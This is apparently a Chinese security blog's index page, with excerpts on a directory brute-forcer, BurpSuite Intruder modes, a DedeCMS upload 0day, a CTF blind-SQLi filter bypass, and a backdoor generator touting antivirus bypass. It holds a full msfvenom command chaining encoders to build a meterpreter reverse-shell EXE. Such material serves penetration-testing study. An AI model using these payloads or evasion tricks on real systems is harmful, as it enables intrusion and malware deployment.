dork 是一款 Web 目录爆破工具.

1
2
3
4
5
6

              ___   
 ____        __H__
|    \ ___ ___|.|__  {1.4#stable}
|  |  | . |  _|.|_/
|____/|___|_| |.|_\
               V     exp10it.cn

dork

feature

支持 GET/POST/HEAD 三种请求方式

自定义 Cookie, Referer, 404 keyword

根据域名组合字典 (备份)

随机 IP, User-Agent

延时时间 (bypass)

Timeout

Read More

BurpSuite Intruder 支持4种攻击模式.

Sniper 狙击手, Battering ram 攻城锤, Pitchfork 干草叉 和 Cluster bomb 集束炸弹.

Read More

之前写轮子的时候看到的, 比较有意思, 就记下来了.

命令 <必选参数1|必选参数2> [-option {必选参数1|必选参数2|必选参数3} [可选参数...]] {(默认参数)|参数1|参数2}

1
2
3
4
5
6

<> 必选参数
[] 可选参数
{} 必选参数 多选一
| 分隔多个互斥参数 多选一
() 参数默认值 只用于 {} 中
... 可为属性指定多个值

20180109 最新版本测试成功.

不过有三个限制

1
2
3
4
5

1.开启会员中心

2.允许发表文章

3.select_images_post

dede_upload_0day.doc

Read More

asyncio 是在 Python 3.4 中引入的异步 IO 标准库.

简单介绍一下什么是同步 IO / 异步 IO.

1
2

同步 IO: 你去约女朋友啪啪啪, 你需要一直等着她来, 之后你才能和她♂.
异步 IO: 你去约女朋友啪啪啪, 在她来的路上你不用一直等着, 可以去买套套什么的.

Read More

1
2
3
4
5

           ___
 _____ ___|  _|_ _ ___ ___ ___ _____
|     |_ -|  _| | | -_|   | . |     |
|_|_|_|___|_|  \_/|___|_|_|___|_|_|_|
         	MSFvenom-NG

这应该会是我持续更新的一个项目.

1
2
3

MSFvenom-NG 是一款交互式 Windows (EXE/DLL Powershell) 后门生成工具

支持自定义编码规则 Bypass 杀毒软件

MSFvenom-NG

假上传点, 其实就是个简单的 SQLi.

filename 时间盲注, 能用 BurpSuite 跑.

无提示地过滤了 and or union 关键字, 用 && || 绕过.

ctf.tar.gz

Read More

除第一次需要指定 payload 外, 其他都用 -p - 代替, 多重编码需要指定 --platform 和 -a 并用 -f raw 输出, 最后一次编码更改为 -f exe.

1

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -e x86/shikata_ga_nai -i 5 -f raw | msfvenom -p - -e x86/jmp_call_additive -i 2 -a x86 --platform windows -f raw | msfvenom -p - e x86/alpha_upper -i 1 -a x86 --platform windows -f exe > msf.exe

Read More

这份渗透测试报告是之前帮一个朋友写的, 敏感信息已经被我抠出来了, 只有框架.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20

1 项目概述

	1.1 渗透测试目的
	1.2 渗透测试范围
	1.3 渗透测试工具
	1.4 渗透测试组织
	1.5 渗透测试原则

2 渗透测试方法

	2.1 工具自动分析
	2.2 人工手动分析
	2.3 风险评估

3 网站漏洞详情

４ 总结

	４.1 网站目前安全现状
	４.2 存在问题和整改建议

渗透测试报告.docx

微软的 DREAD 模型.

高危: 12-15分, 中危: 8-11分, 低危: 0-7分.

Read More